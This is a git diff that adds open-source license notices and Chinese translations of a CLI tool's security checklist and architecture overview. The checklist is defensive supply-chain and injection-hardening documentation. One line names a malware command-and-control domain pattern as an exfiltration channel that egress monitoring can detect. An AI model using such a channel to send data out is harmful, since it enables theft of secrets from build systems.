+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+
+Licenses for support code
+-------------------------
+
+Parts of the TLS test suite are under the Go license. This code is not included
+in BoringSSL (i.e. libcrypto and libssl) when compiled, however, so
+distributing code linked against BoringSSL does not trigger this license:
+
+Copyright (c) 2009 The Go Authors. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+   * Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+   * Redistributions in binary form must reproduce the above
+copyright notice, this list of conditions and the following disclaimer
+in the documentation and/or other materials provided with the
+distribution.
+   * Neither the name of Google Inc. nor the names of its
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+BoringSSL uses the Chromium test infrastructure to run a continuous build,
+trybots etc. The scripts which manage this, and the script for generating build
+metadata, are under the Chromium license. Distributing code linked against
+BoringSSL does not trigger this license.
+
+Copyright 2015 The Chromium Authors. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+   * Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+   * Redistributions in binary form must reproduce the above
+copyright notice, this list of conditions and the following disclaimer
+in the documentation and/or other materials provided with the
+distribution.
+   * Neither the name of Google Inc. nor the names of its
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+```
+
+#### LICENSE-other-bits
+
+```
+Copyright 2015-2025 Brian Smith.
+
+Permission to use, copy, modify, and/or distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
+SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
+OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
+CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+```
+
+### unicode-ident 1.0.24 — (MIT OR Apache-2.0) AND Unicode-3.0
+
+#### LICENSE-APACHE
+
+```
+                              Apache License
+                        Version 2.0, January 2004
+                     http://www.apache.org/licenses/
+
+TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+1. Definitions.
+
+   "License" shall mean the terms and conditions for use, reproduction,
+   and distribution as defined by Sections 1 through 9 of this document.
+
+   "Licensor" shall mean the copyright owner or entity authorized by
+   the copyright owner that is granting the License.
+
+   "Legal Entity" shall mean the union of the acting entity and all
+   other entities that control, are controlled by, or are under common
+   control with that entity. For the purposes of this definition,
+   "control" means (i) the power, direct or indirect, to cause the
+   direction or management of such entity, whether by contract or
+   otherwise, or (ii) ownership of fifty percent (50%) or more of the
+   outstanding shares, or (iii) beneficial ownership of such entity.
+
+   "You" (or "Your") shall mean an individual or Legal Entity
+   exercising permissions granted by this License.
+
+   "Source" form shall mean the preferred form for making modifications,
+   including but not limited to software source code, documentation
+   source, and configuration files.
+
+   "Object" form shall mean any form resulting from mechanical
+   transformation or translation of a Source form, including but
+   not limited to compiled object code, generated documentation,
+   and conversions to other media types.
+
+   "Work" shall mean the work of authorship, whether in Source or
+   Object form, made available under the License, as indicated by a
+   copyright notice that is included in or attached to the work
+   (an example is provided in the Appendix below).
+
+   "Derivative Works" shall mean any work, whether in Source or Object
+   form, that is based on (or derived from) the Work and for which the
+   editorial revisions, annotations, elaborations, or other modifications
+   represent, as a whole, an original work of authorship. For the purposes
+   of this License, Derivative Works shall not include works that remain
+   separable from, or merely link (or bind by name) to the interfaces of,
+   the Work and Derivative Works thereof.
+
+   "Contribution" shall mean any work of authorship, including
+   the original version of the Work and any modifications or additions
+   to that Work or Derivative Works thereof, that is intentionally
+   submitted to Licensor for inclusion in the Work by the copyright owner
+   or by an individual or Legal Entity authorized to submit on behalf of
+   the copyright owner. For the purposes of this definition, "submitted"
+   means any form of electronic, verbal, or written communication sent
+   to the Licensor or its representatives, including but not limited to
+   communication on electronic mailing lists, source code control systems,
+   and issue tracking systems that are managed by, or on behalf of, the
+   Licensor for the purpose of discussing and improving the Work, but
+   excluding communication that is conspicuously marked or otherwise
+   designated in writing by the copyright owner as "Not a Contribution."
+
+   "Contributor" shall mean Licensor and any individual or Legal Entity
+   on behalf of whom a Contribution has been received by Licensor and
+   subsequently incorporated within the Work.
+
+2. Grant of Copyright License. Subject to the terms and conditions of
+   this License, each Contributor hereby grants to You a perpetual,
+   worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+   copyright license to reproduce, prepare Derivative Works of,
+   publicly display, publicly perform, sublicense, and distribute the
+   Work and such Derivative Works in Source or Object form.
+
+3. Grant of Patent License. Subject to the terms and conditions of
+   this License, each Contributor hereby grants to You a perpetual,
+   worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+   (except as stated in this section) patent license to make, have made,
+   use, offer to sell, sell, import, and otherwise transfer the Work,
+   where such license applies only to those patent claims licensable
+   by such Contributor that are necessarily infringed by their
+   Contribution(s) alone or by combination of their Contribution(s)
+   with the Work to which such Contribution(s) was submitted. If You
+   institute patent litigation against any entity (including a
+   cross-claim or counterclaim in a lawsuit) alleging that the Work
+   or a Contribution incorporated within the Work constitutes direct
+   or contributory patent infringement, then any patent licenses
+   granted to You under this License for that Work shall terminate
+   as of the date such litigation is filed.
+
+4. Redistribution. You may reproduce and distribute copies of the
+   Work or Derivative Works thereof in any medium, with or without
+   modifications, and in Source or Object form, provided that You
+   meet the following conditions:
+
+   (a) You must give any other recipients of the Work or
+       Derivative Works a copy of this License; and
+
+   (b) You must cause any modified files to carry prominent notices
+       stating that You changed the files; and
+
+   (c) You must retain, in the Source form of any Derivative Works
+       that You distribute, all copyright, patent, trademark, and
+       attribution notices from the Source form of the Work,
+       excluding those notices that do not pertain to any part of
+       the Derivative Works; and
+
+   (d) If the Work includes a "NOTICE" text file as part of its
+       distribution, then any Derivative Works that You distribute must
+       include a readable copy of the attribution notices contained
+       within such NOTICE file, excluding those notices that do not
+       pertain to any part of the Derivative Works, in at least one
+       of the following places: within a NOTICE text file distributed
+       as part of the Derivative Works; within the Source form or
+       documentation, if provided along with the Derivative Works; or,
+       within a display generated by the Derivative Works, if and
+       wherever such third-party notices normally appear. The contents
+       of the NOTICE file are for informational purposes only and
+       do not modify the License. You may add Your own attribution
+       notices within Derivative Works that You distribute, alongside
+       or as an addendum to the NOTICE text from the Work, provided
+       that such additional attribution notices cannot be construed
+       as modifying the License.
+
+   You may add Your own copyright statement to Your modifications and
+   may provide additional or different license terms and conditions
+   for use, reproduction, or distribution of Your modifications, or
+   for any such Derivative Works as a whole, provided Your use,
+   reproduction, and distribution of the Work otherwise complies with
+   the conditions stated in this License.
+
+5. Submission of Contributions. Unless You explicitly state otherwise,
+   any Contribution intentionally submitted for inclusion in the Work
+   by You to the Licensor shall be under the terms and conditions of
+   this License, without any additional terms or conditions.
+   Notwithstanding the above, nothing herein shall supersede or modify
+   the terms of any separate license agreement you may have executed
+   with Licensor regarding such Contributions.
+
+6. Trademarks. This License does not grant permission to use the trade
+   names, trademarks, service marks, or product names of the Licensor,
+   except as required for reasonable and customary use in describing the
+   origin of the Work and reproducing the content of the NOTICE file.
+
+7. Disclaimer of Warranty. Unless required by applicable law or
+   agreed to in writing, Licensor provides the Work (and each
+   Contributor provides its Contributions) on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+   implied, including, without limitation, any warranties or conditions
+   of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+   PARTICULAR PURPOSE. You are solely responsible for determining the
+   appropriateness of using or redistributing the Work and assume any
+   risks associated with Your exercise of permissions under this License.
+
+8. Limitation of Liability. In no event and under no legal theory,
+   whether in tort (including negligence), contract, or otherwise,
+   unless required by applicable law (such as deliberate and grossly
+   negligent acts) or agreed to in writing, shall any Contributor be
+   liable to You for damages, including any direct, indirect, special,
+   incidental, or consequential damages of any character arising as a
+   result of this License or out of the use or inability to use the
+   Work (including but not limited to damages for loss of goodwill,
+   work stoppage, computer failure or malfunction, or any and all
+   other commercial damages or losses), even if such Contributor
+   has been advised of the possibility of such damages.
+
+9. Accepting Warranty or Additional Liability. While redistributing
+   the Work or Derivative Works thereof, You may choose to offer,
+   and charge a fee for, acceptance of support, warranty, indemnity,
+   or other liability obligations and/or rights consistent with this
+   License. However, in accepting such obligations, You may act only
+   on Your own behalf and on Your sole responsibility, not on behalf
+   of any other Contributor, and only if You agree to indemnify,
+   defend, and hold each Contributor harmless for any liability
+   incurred by, or claims asserted against, such Contributor by reason
+   of your accepting any such warranty or additional liability.
+
+END OF TERMS AND CONDITIONS
+```
+
+#### LICENSE-MIT
+
+```
+Permission is hereby granted, free of charge, to any
+person obtaining a copy of this software and associated
+documentation files (the "Software"), to deal in the
+Software without restriction, including without
+limitation the rights to use, copy, modify, merge,
+publish, distribute, sublicense, and/or sell copies of
+the Software, and to permit persons to whom the Software
+is furnished to do so, subject to the following
+conditions:
+
+The above copyright notice and this permission notice
+shall be included in all copies or substantial portions
+of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF
+ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
+TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
+PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
+SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
+IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+DEALINGS IN THE SOFTWARE.
+```
+
+#### LICENSE-UNICODE
+
+```
+UNICODE LICENSE V3
+
+COPYRIGHT AND PERMISSION NOTICE
+
+Copyright © 1991-2023 Unicode, Inc.
+
+NOTICE TO USER: Carefully read the following legal agreement. BY
+DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING DATA FILES, AND/OR
+SOFTWARE, YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE
+TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT AGREE, DO NOT
+DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR SOFTWARE.
+
+Permission is hereby granted, free of charge, to any person obtaining a
+copy of data files and any associated documentation (the "Data Files") or
+software and any associated documentation (the "Software") to deal in the
+Data Files or Software without restriction, including without limitation
+the rights to use, copy, modify, merge, publish, distribute, and/or sell
+copies of the Data Files or Software, and to permit persons to whom the
+Data Files or Software are furnished to do so, provided that either (a)
+this copyright and permission notice appear with all copies of the Data
+Files or Software, or (b) this copyright and permission notice appear in
+associated Documentation.
+
+THE DATA FILES AND SOFTWARE ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
+KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF
+THIRD PARTY RIGHTS.
+
+IN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS NOTICE
+BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL DAMAGES,
+OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
+ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THE DATA
+FILES OR SOFTWARE.
+
+Except as contained in this notice, the name of a copyright holder shall
+not be used in advertising or otherwise to promote the sale, use or other
+dealings in these Data Files or Software without prior written
+authorization of the copyright holder.
+```

--- a/docs/SECURITY_CHECKLIST.ja.md
+++ b/docs/SECURITY_CHECKLIST.ja.md
@@ -1,5 +1,5 @@
 > [!NOTE]
-> :us: [English](./SECURITY_CHECKLIST.md)
+> :us: [English](./SECURITY_CHECKLIST.md) | :cn: [简体中文](./SECURITY_CHECKLIST.zh.md)
 
 # CLI セキュリティチェックリスト
 

--- a/docs/SECURITY_CHECKLIST.md
+++ b/docs/SECURITY_CHECKLIST.md
@@ -1,5 +1,5 @@
 > [!NOTE]
-> :jp: [日本語版](./SECURITY_CHECKLIST.ja.md)
+> :jp: [日本語版](./SECURITY_CHECKLIST.ja.md) | :cn: [简体中文](./SECURITY_CHECKLIST.zh.md)
 
 # CLI Security Checklist
 

--- a/docs/SECURITY_CHECKLIST.zh.md
+++ b/docs/SECURITY_CHECKLIST.zh.md
@@ -1,0 +1,115 @@
+> [!NOTE]
+> :us: [English](./SECURITY_CHECKLIST.md) | :jp: [日本語版](./SECURITY_CHECKLIST.ja.md)
+
+# CLI 安全检查清单
+
+这是 vibe CLI 工具的一份全面安全检查清单。每个类别都记录了本项目所采用的缓解措施。
+
+## 1. 命令注入
+
+- **风险**：通过未经净化的用户输入执行任意命令
+- **缓解措施**：使用带数组参数的 `spawn()`（绝不拼接 shell 字符串）
+- **强制手段**：ESLint `security/detect-child-process` + 自定义安全检查脚本
+
+## 2. 路径穿越
+
+- **风险**：通过 `../` 序列访问预期目录之外的文件
+- **缓解措施**：`validate_path`（`rust/crates/vibe-core/src/copy/types.rs`）以及 `repo_info.rs` 中的 canonicalize + 包含性检查，将路径限制在预期边界内
+- **强制手段**：代码审查 + 运行时校验
+
+## 3. 符号链接攻击
+
+- **风险**：跟随符号链接访问/修改非预期的文件
+- **缓解措施**：`std::fs::canonicalize` 解析 + 包含性检查（两侧均做 canonicalize）；glob 展开会拒绝符号链接条目
+- **强制手段**：在文件操作前进行运行时校验
+
+## 4. TOCTOU（检查时到使用时）竞态
+
+- **风险**：文件状态在安全检查与实际使用之间发生变化
+- **缓解措施**：`verify_trust_and_read`（`rust/crates/vibe-core/src/settings_io.rs`）只读取文件一次，并对这份完全相同的内容计算哈希（不会重新读取）
+- **强制手段**：信任校验中的架构性模式
+
+## 5. 环境变量注入
+
+- **风险**：环境变量中的恶意取值影响程序行为
+- **缓解措施**：受控的环境变量合并，配合显式的允许列表
+- **强制手段**：代码审查
+
+## 6. 终端转义序列注入
+
+- **风险**：输出中的恶意转义序列操纵终端显示
+- **缓解措施**：对面向用户的输出过滤控制字符
+- **强制手段**：输出净化工具函数
+
+## 7. 参数注入（`--` 选项注入）
+
+- **风险**：用户输入被当作命令行选项解释（例如 `--exec`）
+- **缓解措施**：使用显式的参数数组（而非字符串拼接）
+- **强制手段**：`spawn()` 数组模式 + 代码审查
+
+## 8. 供应链攻击
+
+- **风险**：上游包被投毒、恶意的生命周期脚本、从构建 runner 中窃取数据，或发布令牌被劫持 —— 参见例如 [TanStack npm compromise (2026-05-11)](https://tanstack.com/blog/npm-supply-chain-compromise-postmortem)
+- **缓解措施**（分层）：
+  - **registry 加固**：Takumi Guard 代理（`.github/actions/setup-takumi-guard`）拦截已知的恶意包；`pnpm-workspace.yaml` 中的 `minimumReleaseAge: 4320`（72 小时）隔离期会阻止刚刚发布的版本
+  - **不使用非常规来源**：`blockExoticSubdeps: true` 会在依赖图的任何位置拒绝 `github:user/repo`、`file:`、`http:` 等非 registry 依赖（可挫败可蠕虫化的 `optionalDependencies: github:<sha>` 手法）
+  - **默认关闭生命周期脚本**：`strictDepBuilds: true` + 显式的 `only-built-dependencies` 允许列表（目前仅有 `node-pty`，参见 `.npmrc`）；CI 中每次调用 `pnpm install` 和 `pnpm publish` 都带 `--ignore-scripts`
+  - **信任单调性**：`trustPolicy: no-downgrade` 会在某个包转变为信任度更低的状态时中止安装
+  - **锁文件固定**：CI 中的每个安装步骤都使用 `--frozen-lockfile`
+  - **工作流完整性**：所有第三方 GitHub Actions 均固定到完整的 commit SHA（`pinact-verify` job 会阻止未固定的引用）；工具链通过 `flake.lock` 可复现地固定（Rust 则通过 `rust-toolchain.toml`）
+  - **Runner 出站流量可见性**：每个 job 上的 `step-security/harden-runner`（审计模式）会记录出站网络流量与 `/proc` 访问，从而暴露诸如 Shai-Hulud 所使用的 `*.getsession.org` C2 这类数据外泄通道
+  - **发布来源证明**：每次发布都使用 `npm publish --provenance`，以获得 OIDC 签名的证明
+  - **密钥扫描**：`gitleaks`（配置文件 `.gitleaks.toml`）阻止凭据进入仓库 —— 在 `pre-commit` 钩子（`lefthook.yml`）中扫描暂存的更改，并在 `gitleaks` CI job 中扫描完整历史
+- **强制手段**：`pinact-verify` CI job + CI 中的 `pnpm install --frozen-lockfile --ignore-scripts` + `pnpm publish ... --ignore-scripts` + `gitleaks` CI job + 每次发布后审查 Harden-Runner Insights
+
+### 应对 gitleaks 检出
+
+gitleaks 命中意味着该密钥已经进入工作区或 git 历史，必须视为已经泄露：
+
+1. **立即轮换**：在做任何其他事情之前，先在来源方（服务提供商）吊销/轮换泄露的凭据 —— 一旦提交就必须假定它已经公开。
+2. **从历史中清除**：可以考虑重写历史（例如 `git filter-repo`）来移除该密钥，但要认识到无论如何旧值都已处于泄露状态。
+3. **仅对误报使用允许列表**：只有当匹配项确实不是密钥时，才在 `.gitleaks.toml` 中添加取值/正则条目 —— 绝不能用它来掩盖真实的泄露。
+
+## 9. 不安全的临时文件创建
+
+- **风险**：可预测的临时文件名会使符号链接攻击成为可能
+- **缓解措施**：基于 UUID 的命名 + 原子性的 rename 操作
+- **强制手段**：代码审查 + fast-remove 的实现
+
+## 10. Shell 输出注入
+
+- **风险**：包含特殊字符（例如单引号）的路径在被 `eval` 时导致 shell 注入
+- **缓解措施**：`shell_escape()`（`rust/crates/vibe-core/src/shell.rs`）会对所有 `cd` 输出中的单引号进行转义
+- **强制手段**：自定义安全检查脚本会检测未转义的 `cd` 模式
+- **参考**：完整协议规范：[specifications/eval-contract.zh.md](specifications/eval-contract.zh.md)
+
+## 11. 配置文件投毒
+
+- **风险**：恶意的 `.vibe.toml` 通过钩子执行任意命令
+- **缓解措施**：SHA-256 信任机制 —— 配置必须先被显式信任，钩子才会执行
+- **强制手段**：`trust`/`untrust`/`verify` 命令 + 哈希校验
+
+## 12. 不安全的正则表达式（ReDoS）
+
+- **风险**：存在灾难性回溯的正则表达式导致拒绝服务
+- **缓解措施**：ESLint `security/detect-unsafe-regex` 规则
+- **强制手段**：CI 中的 ESLint + pre-commit 检查
+
+## 13. eval / 动态代码执行
+
+- **风险**：执行动态构造的代码会导致任意代码执行
+- **缓解措施**：生产代码中不使用 `eval()` 或 `new Function()`
+- **强制手段**：ESLint `security/detect-eval-with-expression` + 自定义安全检查脚本
+- **备注**：shell 包装函数本身会按设计 `eval` vibe 输出的 `cd` 内容；该输出经过单引号转义（参见上文的“Shell 输出注入”）。完整协议规范：[specifications/eval-contract.zh.md](specifications/eval-contract.zh.md)
+
+---
+
+## 自动化强制手段
+
+| 工具                  | 范围       | 时机                                                    |
+| --------------------- | ---------- | ------------------------------------------------------- |
+| ESLint security 插件  | 静态分析   | `pnpm run lint`                                         |
+| 自定义安全脚本        | 模式匹配   | `pnpm run security:check`                               |
+| Claude Code 钩子      | 编辑时检查 | PostToolUse (Write/Edit)                                |
+| CI security-check job | PR 门禁    | 每次 push/PR                                            |
+| gitleaks              | 密钥扫描   | `pre-commit`（暂存内容）+ CI `gitleaks` job（完整历史） |

--- a/docs/architecture.ja.md
+++ b/docs/architecture.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./architecture.md)
+> 🇺🇸 [English](./architecture.md) | 🇨🇳 [简体中文](./architecture.zh.md)
 
 # アーキテクチャ概要
 

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -1,4 +1,4 @@
-> 🇯🇵 [日本語版](./architecture.ja.md)
+> 🇯🇵 [日本語版](./architecture.ja.md) | 🇨🇳 [简体中文](./architecture.zh.md)
 
 # Architecture Overview
 

--- a/docs/architecture.zh.md
+++ b/docs/architecture.zh.md
@@ -1,0 +1,192 @@
+> 🇺🇸 [English](./architecture.md) | 🇯🇵 [日本語版](./architecture.ja.md)
+
+# 架构概览
+
+> **历史说明：** 本文所述的 TypeScript 运行时抽象层（Deno/Node.js）以及 `@kexi/vibe-native` N-API 模块，已在 Rust 移植的 Phase 6 中移除。vibe 现在是单一的 Rust 二进制文件，worktree 逻辑位于 `rust/crates/vibe-core`，原生 CoW 实现位于 `rust/crates/vibe-native`（静态链接）。本文档作为设计历史保留。
+
+本文档介绍 Vibe CLI 工具的架构。
+
+## 运行时抽象层
+
+在 TypeScript 时期的实现中，Vibe 通过运行时抽象层支持多种 JavaScript 运行时（Deno 和 Node.js）。当前实现是单一的 Rust 二进制文件，不再支持 Deno。
+
+```mermaid
+flowchart TD
+    subgraph Application
+        A[CLI Commands] --> B[AppContext]
+        B --> C[Runtime Interface]
+    end
+
+    subgraph "Runtime Implementations"
+        C --> D[Deno Runtime]
+        C --> E[Node.js Runtime]
+    end
+
+    subgraph "Native Modules"
+        D --> F["@kexi/vibe-native (N-API)"]
+        E --> F
+    end
+
+    subgraph "Platform Operations"
+        F --> H[clonefile/FICLONE]
+        F --> I[Trash Operations]
+    end
+```
+
+### 核心组件
+
+| 组件              | 说明                                             |
+| ----------------- | ------------------------------------------------ |
+| CLI Commands      | 面向用户的命令（start、clean、trust 等）         |
+| AppContext        | 用于运行时、项目配置和用户设置的依赖注入容器     |
+| Runtime Interface | 文件系统、进程、环境操作的抽象接口               |
+| Deno Runtime      | 支持 N-API 原生模块的 Deno API 实现              |
+| Node.js Runtime   | 支持 N-API 原生模块的 Node.js API 实现           |
+| @kexi/vibe-native | 用于 Copy-on-Write 和回收站操作的共享 N-API 模块 |
+
+## 复制策略
+
+Vibe 会根据平台能力，为文件和目录的复制选用不同的策略。
+
+```mermaid
+flowchart TD
+    A[CopyService] --> B{detectCapabilities}
+    B --> C{CoW Supported?}
+    C -->|Yes| D[NativeCloneStrategy]
+    C -->|No| E{rsync available?}
+    E -->|Yes| F[RsyncStrategy]
+    E -->|No| G[StandardStrategy]
+
+    D --> H[clonefile / FICLONE]
+    F --> I[rsync -a]
+    G --> J[recursive copy]
+```
+
+### 策略选择
+
+| 策略                | 平台                             | 说明                             |
+| ------------------- | -------------------------------- | -------------------------------- |
+| NativeCloneStrategy | macOS (APFS)、Linux (Btrfs, XFS) | 使用 Copy-on-Write 实现瞬时复制  |
+| RsyncStrategy       | 类 Unix 系统                     | 使用 rsync 实现高效复制          |
+| StandardStrategy    | 全部                             | 逐个文件的递归复制               |
+
+## 清理策略
+
+Vibe 提供支持回收站的快速目录删除能力。
+
+```mermaid
+flowchart TD
